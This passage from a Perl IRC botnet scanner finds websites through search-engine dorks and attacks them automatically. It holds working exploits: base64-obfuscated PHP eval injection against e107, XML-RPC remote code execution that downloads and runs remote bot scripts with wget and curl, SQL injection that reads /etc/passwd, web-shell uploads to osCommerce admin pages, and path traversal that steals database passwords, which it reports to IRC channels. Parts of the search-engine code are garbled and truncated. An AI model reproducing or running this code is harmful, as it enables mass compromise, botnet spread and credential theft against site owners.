&msg("$chan","$e107logo0,1(4@0Vuln) ".$test." 15(4@".$sys.")(4@7safemode-on)");sleep(2);

}

} exit; } sleep(2);

}

}

}

}
sub e107_rce_query() {

my $url = $_[0];

my $code = $_[1];

my $req = HTTP::Request->new(POST => $url);

$req->content_type('application/x-www-form-urlencoded');

$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");

my $ua = LWP::UserAgent->new(agent => $uagent);

$ua->timeout(7);

my $res = $ua->request($req);

return $res->content;

}
sub e107_spread_query() {

my $url = $_[0];

my $code = "7ZPfasIwFMbvB3uHGAamMqv7c2XnEPYAe4FBadMTW5cmIUmtMnz3JWmrDASZsLvdpef7vt85JKdAS4nwdq7e9FP7kutXnNzeQCiavVngWJUqbURWA4liPBjuaF0scbAJmc+LvU8ntEAzW6tE12iqGSqkjidoEm/UOp4kDCwtUWmtWsxmn1Jbl46pmOW58SHvSlwvNJx7yPDZrsFen6aN5mj6fj2At2payFZwmRW/oPgb2Wb6/1Z+UMIGgYF1U/k9gh3x+xQlYZ9OgnOxRlBbSYGCh0H05ZIaDFqi8djpFUNkBLWy+072esXIEEthVxlryBh2QMdBXfljMN97UJQcgRtZCYI/BD4KB/cncAPngKYEztMTtmesTvVuoAuUvbFQ94PJPDU205b40KqTjpCB70zuyVMqhQXhEMHriiCKlHLIBLnQUmXG2FI3Z5sO4h+0lQpEf1XME0OhewessU+3ZcWBjFYMJOtfE32hMEHsAkxDVnSBh/njc5Sgg5+YcmmA3LHQ31U02EaLEPOVbw==";

my $req = HTTP::Request->new(POST => $url);

$req->content_type('application/x-www-form-urlencoded');

$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");

my $ua = LWP::UserAgent->new(agent => $uagent);

$ua->timeout(7);

my $res = $ua->request($req);

}
sub xml() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$xmllogo Scan finish"); }

my $test = "http://".$site.$bug;

my $vuln = "http://".$site."".$bug;

my $html = &get_content($test);

if ($html =~ /faultCode/ ) {

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

my $resp = &xml_cek_query($test);

if ($resp =~ /j13mb0t(.*)j13mb0t/s) {

&xml_spread_query($test);sleep(2);

my $sys = $1;

my $check = &get_content("http://".$site."e107.php");

&get_content("http://".$site."copy.php");

&get_content("http://".$site."paste.php");

if ($check =~ /Hacked By Rose/) {

&msg("$chan","$xmllogo15(@SheLL) http://".$site."7e107.php ".$sys);&get_content("http://".$site."copy.php"); sleep(2);}

else {

&msg("$chan","$xmllogo0,1(4@0SysTem)7 ".$vuln." ".$sys); sleep(2);}

}

sleep(2); } exit; } }

}

}

}
sub xml_cek_query() {

my $url = $_[0];

my $code = "system('uname -a');";

my $ua = LWP::UserAgent->new(agent => 'perl post');

$exploit = "< ?xml version=\"1.0\"?>";

$exploit .= "test.method";

$exploit .= "',''));";

$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*";

$ua->timeout(7);

my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);

return $res->content;

}
sub xml_spread_query() {

my $xmltargt = $_[0];

my $xmlsprd = "system('wget ".$injector." -O e107.php;fetch ".$injector.";mv yahoo.jpg e107.php;wget ".$botshell." -O copy.php;fetch ".$botshell.";mv copy.jpg copy.php;wget ".$botshell2." -O paste.php;fetch ".$botshell2.";mv paste.jpg paste.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php copy.jpg;rm -rf copy.jpg;wget ".$botshell.";php copy.jpg;rm -rf copy.jpg;curl -O ".$botshell.";php copy.jpg;rm -rf copy.jpg;lwp-download ".$botshell.";php copy.jpg;fetch ".$botshell2.";php paste.jpg;rm -rf paste.jpg;wget ".$botshell2.";php paste.jpg;rm -rf paste.jpg;curl -O ".$botshell2.";php paste.jpg;rm -rf paste.jpg;lwp-download ".$botshell2.";php paste.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php copy.jpg;rm -rf copy.jpg;wget ".$botshell.";php copy.jpg;rm -rf copy.jpg;curl -O ".$botshell.";php copy.jpg;rm -rf copy.jpg;lwp-download ".$botshell.";php copy.jpg;fetch ".$botshell2.";php paste.jpg;rm -rf paste.jpg;wget ".$botshell2.";php paste.jpg;rm -rf paste.jpg;curl -O ".$botshell2.";php paste.jpg;rm -rf paste.jpg;lwp-download ".$botshell2.";php paste.jpg;');";

my $userAgent = LWP::UserAgent->new(agent => 'perl post');

$exploit = "< ?xml version=\"1.0\"?>";

$exploit .= "test.method";

$exploit .= "',''));";

$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*";

$userAgent->timeout(7);

$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);

}
sub sql() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$sqllogo Scan finish"); }

my $test = "http://".$site.$bug."'";

my $vuln = "http://".$site."4".$bug;

my $sqlsite = "http://".$site.$bug;

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {

&msg("$chan","$sqllogo0,1(4@0MsSQL) ".$vuln);}

elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {

&msg("$chan","$sqllogo0,1(4@0MsAccess) ".$vuln);}

elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {

&sqlbrute($sqlsite,$chan,$engine);}

} exit; sleep(2); }

}

}

}

sub sqlbrute() {

my $situs=$_[0];

my $chan =$_[1];

my $engine=$_[2];

my $columns=20;

my $cfin.="--";

my $cmn.= "+";

for ($column = 0 ; $column < $columns ; $column ++)

{

$union.=','.$column;

$inyection.=','."0x6c6f67696e70776e7a";

if ($column == 0)

{

$inyection = '';

$union = '';

}

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;

$response=get($sql);

if($response =~ /loginpwnz/)

{

$column ++;

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;

&msg("$chan","$sqllogo0,1(4@0SQL) $sql ");

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;

$response=get($sql)or die("[-] Impossible to get Information_Schema\n");

if($response =~ /loginpwnz/)

{

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;

&msg("$chan","$sqllogo0,1(4@0SQL)(4@INFO_SCHEMA) $sql ");

}

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;

$response=get($sql)or die("[-] Impossible to get MySQL.User\n");

if($response =~ /loginpwnz/)

{

$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;

&msg("$chan","$sqllogo0,1(4@0SQL)(4@USER) $sql ");

}

else

{

}

while ($loadcont < $column-1) { $loadfile.=','.'load_file(0x2f6574632f706173737764)'; $loadcont++; } $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin; $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n"); if($response =~ /root:x:/) { &msg("$chan","$sqllogo0,1(4@0SQL)(4@Load File) $sql "); } else { } foreach $tabla(@tabele) { chomp($tabla); $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get tables\n"); if($response =~ /loginpwnz/) { $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin; &msg("$chan","$sqllogo0,1(4@0SQL)(4@Tabel) $sql "); &tabelka($situs,$tabla,$chan,$engine); } } } } } sub tabelka() { my $situs =$_[0]; my $tabla =$_[1]; my $chan =$_[2]; my $engine=$_[3]; my $cfin.="--"; my $cmn.= "+"; chomp($tabla); foreach $columna(@kolumny) { chomp($columna); $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin; $response=get($sql)or die("[-] Impossible to get columns\n"); if ($response =~ /loginpwnz/) { &msg("$chan","$sqllogo0,1(4@0SQL)(4@SQLi Vuln) $situs (4@Kolom) $columna (4@Tabel) $tabla "); } } } sub osco() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $count = 0; my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo); my $num = scalar(@list); if ($num > 0) {

foreach my $site (@list) {

$count++;

# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }

my $test = "http://".$site.$bug;

my $test1 = "http://".$site."admin/file_manager.php/login.php";

my $test2 = "http://".$site."admin/banner_manager.php/login.php";

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {

&msg("$chan","$oscologo0,1(4@0System)7 ".$test);

&osco_xpl($test,$chan,$site,$engine);

&osco2($test1,$chan,$bug,$dork,$engine);

&osco_xpl3($test2,$chan,$site,$engine);

&osql($chan,$site,$engine);

} else { }

} exit; sleep(2); }

}

}

}
sub osco_xpl() {

my $browser = LWP::UserAgent->new;

my $url = $_[0]."?cPath=&action=new_product_preview";

my $chan = $_[1];

my $site = $_[2];

my $engine = $_[3];

my $res = $browser->post( $url,['products_image' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['products_image' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['products_image' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['products_image' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);

if ($check =~ /Hacked By Rose/) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>

/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)

/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}

&msg("#HacKeD","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

&msg("Rose","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

}

}
sub osco2() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }

my $test = "http://".$site.$bug;

my $test1 = "http://".$site."admin/banner_manager.php/login.php";

my $test2 = "http://".$site."admin/categories.php/login.php";

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /TABLE_HEADING_FILENAME/) {

&msg("$chan","$oscologo(0$engine0)0(110System0)0 ".$test);

&osco_xpl2($test,$chan,$site,$engine);

&osco_xpl3($test1,$chan,$site,$engine);

&osco_xpl($test2,$chan,$site,$engine);

&osql($chan,$site,$engine);

} else { }

} exit; sleep(2); }

}

}

}
sub osco_xpl2() {

my $browser = LWP::UserAgent->new;

my $url = $_[0]."?action=processuploads";

my $chan = $_[1];

my $site = $_[2];

my $engine = $_[3];

my $res = $browser->post( $url,['file_1' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['file_1' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['file_1' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['file_1' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);

if ($check =~ /Hacked By Rose/) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>

/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)

/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}

&msg("#HacKeD","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

&msg("Rose","$oscologo0,1(4@0SHeLL) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

}

}
sub osco3() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

# if ($count == $num-1) { &msg("$chan","$oscologo Scan finish"); }

my $test = "http://".$site.$bug;

my $test1 = "http://".$site."admin/file_manager.php/login.php";

my $test2 = "http://".$site."admin/categories.php/login.php";

my $html = &get_content($test);

if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {

if ($html =~ /TABLE_HEADING_BANNERS/) {

&msg("$chan","$oscologo0,1(4@0System)7 ".$test);

&osco_xpl3($test,$chan,$site,$engine);

&osco_xpl2($test1,$chan,$site,$engine);

&osco_xpl($test2,$chan,$site,$engine);

&osql($chan,$site,$engine);

} else { }

} exit; sleep(2); }

}

}

}

sub osco_xpl3() {

my $browser = LWP::UserAgent->new;

my $url = $_[0]."?action=insert";

my $chan = $_[1];

my $site = $_[2];

my $engine = $_[3];

my $res = $browser->post( $url,['banners_image' => ['./yahoo.jpg' => 'log.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resa = $browser->post( $url,['banners_image' => ['./google.jpg' => 'osco.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resb = $browser->post( $url,['banners_image' => ['./copy.jpg' => 'copy.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $resc = $browser->post( $url,['banners_image' => ['./paste.jpg' => 'paste.php' => 'application/octet-stream']],'Content-Type' => 'form-data');

my $hasil = $res->as_string;

my $hasil1 = $resa->as_string;

my $hasil2 = $resb->as_string;

my $hasil3 = $resc->as_string;

my $check = &get_content("http://".$site."images/osco.php");&get_content("http://".$site."images/copy.php");&get_content("http://".$site."images/paste.php");sleep(3);

if ($check =~ /Hacked By Rose/) {

my $safe ="";

my $os ="";

my $free ="";

if ($check =~ m/Software : (.*?)< \/u>< \/b>< \/a>

/) {$soft = $1;}

if ($check =~ m/SAFE MODE is (.*?)< \/b>< \/font>/) {$safe = $1;}

if ($check =~ m/OS : (.*?)

/) {$os = $1;}

if ($check =~ m/Freespace : (.*?)< \/p>< \/td>< \/tr>/) {$free = $1;}

&msg("#HacKeD","$oscologo0,1(4@0SHeLLx) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

&msg("Rose","$oscologo0,1(4@0SHeLLx) http://".$site."images/4osco.php (4@15SafeMode= $safe)(4@15OS= $os)(4@15FreeSpace= $free)");sleep(2);

}

}
sub osql() {

my $chan = $_[0];

my $site = $_[1];

my $engine = $_[2];

my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";

my $re = &get_content($test);

if ($re =~ /http:\/\//){

&osql_xpl($test,$chan,$site);

}

}
sub osql_xpl() {

my $url = $_[0];

my $chan = $_[1];

my $site = $_[2];

my $request = HTTP::Request->new(GET=>$url);

my $browser = LWP::UserAgent->new();

$browser->timeout(10);

my $response = $browser->request($request);

if ($response->is_success) {

my $res = $response->as_string;

if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {

&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DIR path: 4 $1");

}

if ($res =~ m/'DB_SERVER', '(.*)'/g) {

&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB Server: 4 $1");

}

if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {

&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB username: 4 $1");

}

if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {

&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB password: 4 $1");

}

if ($res =~ m/'DB_DATABASE', '(.*)'/g) {

&msg("$chan","$ossqllogo(4@VULN)15 http://".$site." [+]DB database: 4 $1");

}

}

}
sub oscoQ() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$ossqllogo Scan finish"); }

my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";

my $re = &get_content($test);

if ($re =~ /http:\/\//){

&osql_xpl($test,$chan,$site);

}

}

}

}
sub e107xpl1() {

my $chan = $_[0];

my $site = $_[1];

my $engine = $_[2];

my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";

my $re = &get_content($test);

if ($re =~ /http:\/\//){

&osql_xpl($test,$chan,$site);

}

}
sub e107xpl() {

my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $count = 0;

my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);

my $num = scalar(@list);

if ($num > 0) {

foreach my $site (@list) {

$count++;

if ($count == $num-1) { &msg("$chan","$e107logosql Scan finish"); }

my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";

my $re = &get_content($test);

if ($re =~ /http:\/\//){

&msg("$chan","$e107logosql0,1(4@0System)7 ".$test);

&e107_cuk($test,$chan,$site);

}

}

}

}

sub e107_cuk() {

my $url = $_[0];

my $chan = $_[1];

my $site = $_[2];

my $request = HTTP::Request->new(GET=>$url);

my $browser = LWP::UserAgent->new();

$browser->timeout(10);

my $response = $browser->request($request);

if ($response->is_success) {

my $res = $response->as_string;

if ($res =~ m/mySQLserver = '(.*)'/g) {

&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB Server: $1");

}

if ($res =~ m/mySQLuser = '(.*)'/g) {

&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB username: $1");

}

if ($res =~ m/mySQLpassword = '(.*)'/g) {

&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB password: $1");

}

if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {

&msg("$chan","$e107logosql (4@VULN) http://".$site." [+]DB database: $1");

}

}

}
#########################################
sub search_engine() {

my (@total,@clean);
my $chan = $_[0];

my $bug = $_[1];

my $dork = $_[2];

my $engine = $_[3];

my $logo = $_[4];

if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }

if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }

if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }

if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }

if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }

if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }

if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }

if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }

if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }

if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }

if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }

if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }

if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }

if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }

if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }

if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }

if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }

if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }

if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }

if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }

if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }

if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }

if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }

if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }

if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }

if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }

if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }

if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }

if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }

if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }

if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }

if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }

@clean = &clean(@total);

# &msg("$chan","$logo4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");

return @clean;

}
#########################################
sub isFound() {

my $status = 0;

my $link = $_[0];

my $reqexp = $_[1];

my $res = &get_content($link);

if ($res =~ /$reqexp/) { $status = 1 }

return $status;

}
sub get_content() {

my $url = $_[0];

my $ua = LWP::UserAgent->new(agent => $uagent);

$ua->timeout(7);

my $req = HTTP::Request->new(GET => $url);

my $res = $ua->request($req);

return $res->content;

}
######################################### SEARCH ENGINE gibla
sub google() {

my @list;

my $key = $_[0];

for (my $i=0; $i< =400; $i+=10){

my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub rediff() {

my @list;

my $key = $_[0];

for (my $i=0; $i< =500; $i+=10) { my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i); $b = "$i"; my $res = &search_engine_query($search); if ($res !~ /firstres=$b\'>/) {$i=500;}

while ($res =~ m/ if ($1 !~ /rediff\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub uol() {

my @list;

my $key = $_[0];

for (my $i=1; $i my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);

my $res = &search_engine_query($search);

if ($res !~ m/pr?xima< \/span>/){$i=500;}

while ($res =~ m/ if ($1 !~ /uol\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub bing() {

my @list;

my $key = $_[0];

for (my $i=1; $i< =500; $i+=10) {

my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");

my $res = &search_engine_query($search);

if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}

while ($res =~ m/ if ($1 !~ /bing\.com/) {

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub altavista() {

my @list;

my $key = $_[0];

for (my $i=1; $i< =500; $i+=10){ my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i); my $res = &search_engine_query($search); if ($res !~ /target=\"_self\">Succ/) {$i=500;}

while ($res =~ m/(.+?)\//g) {

if ($1 !~ /altavista/){

my $link = $1;

$link =~ s//g) {

if ($1 !~ /yippy\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub gutser() {

my @list;

my $key = $_[0];

for ($b=1; $b< =50; $b+=1) { my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0"); my $res = &search_engine_query($search); while ($res =~ m/http:\/\/([^>\"]*)\">/g) {

if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub google2() {

my @list;

my $key = $_[0];

my $b = 0;

my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");

foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];

for ($b=1; $b< =200; $b+=10) {

my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");

my $res = &search_engine_query($search);

while ($res =~ m/ if ($1 !~ /google/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

} return @list;

}

}
sub exalead() {

my @list;

my $key = $_[0];

for ($b=0; $b< =1000; $b+=100) {

my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);

my $res = &search_engine_query($search);

if ($res =~ m//g) {$b=1000;}

while ($res =~ m/ my $link = $1;

if ($link!~ /exalead/){

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

} 
sub lycos() {

my @list;

my $key = $_[0];

for ($b=0; $b my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {

if ($1 !~ /lycos\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub virgilio() {

my @list;

my $key = $_[0];

for ($b=10; $b my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);

my $res = &search_engine_query($search);

if ($res =~ m/non ha prodotto risultati/i) {$b=500;}

if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}

while ($res =~ m/ if ($1 !~ /baidu\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub kipot() {

my @list;

my $key = $_[0];

my $b = 0;

for ($b=1; $b my $search = ("http://www.qkport.com/".$b."/web/".&key($key));

my $res = &search_engine_query($search);

while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {

if ($1 !~ /qkport\.com/){

my $link = $1;

my @grep = &links($link);

push(@list,@grep);

}

}

}

return @list;

}
sub gibla() { #mati#

my @list;

my $key = $_[0];

my $hal = "/search?q=".&key($key);

